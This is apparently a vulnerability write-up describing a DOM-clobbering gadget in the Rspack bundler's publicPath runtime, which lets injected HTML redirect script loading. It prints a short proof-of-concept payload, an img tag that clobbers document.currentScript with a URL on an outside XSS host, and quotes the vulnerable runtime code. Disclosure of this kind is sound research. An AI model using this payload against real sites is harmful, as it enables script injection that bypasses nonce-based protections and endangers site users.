Rspack is a high performance JavaScript bundler written in Rust. It offers strong compatibility with the webpack ecosystem, allowing for seamless replacement of webpack, and provides lightning fast build speeds.
This issue was supposed to be fixed in v1.0.0-rc.1. However, it appears that under certain conditions, such as this @arkark_ challenge, it is still possible to reproduce it in the latest version.
<!-- user input -->
<img name="currentScript" src="https://gmsgadget.com/assets/xss/index.js">
<script nonce="secret" src="https://gmsgadget.com/assets/libs/rspack/bundle.js"></script>Root Cause
Source: It was supposed to be in crates/rspack_plugin_hmr/src/runtime/hot_module_replacement.js but, I didn’t found any reference to it. You can find one of the expected case which contains it here.
/******/ /* webpack/runtime/publicPath */
/******/ (() => {
/******/ var scriptUrl;
/******/ if (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + "";
/******/ var document = __webpack_require__.g.document;
/******/ if (!scriptUrl && document) {
/******/ if (document.currentScript)
/******/ scriptUrl = document.currentScript.src
/******/ if (!scriptUrl) {
/******/ var scripts = document.getElementsByTagName("script");
/******/ if(scripts.length) scriptUrl = scripts[scripts.length - 1].src
/******/ }
/******/ }
/******/ // When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration
/******/ // or pass an empty string ("") and set the __webpack_public_path__ variable from your code to use your own logic.
/******/ if (!scriptUrl) throw new Error("Automatic publicPath is not supported in this browser");
/******/ scriptUrl = scriptUrl.replace(/#.*$/, "").replace(/\?.*$/, "").replace(/\/[^\/]+$/, "/");
/******/ __webpack_require__.p = scriptUrl;
/******/ })();
Related links:
Found by jackfromeast, ishmeals.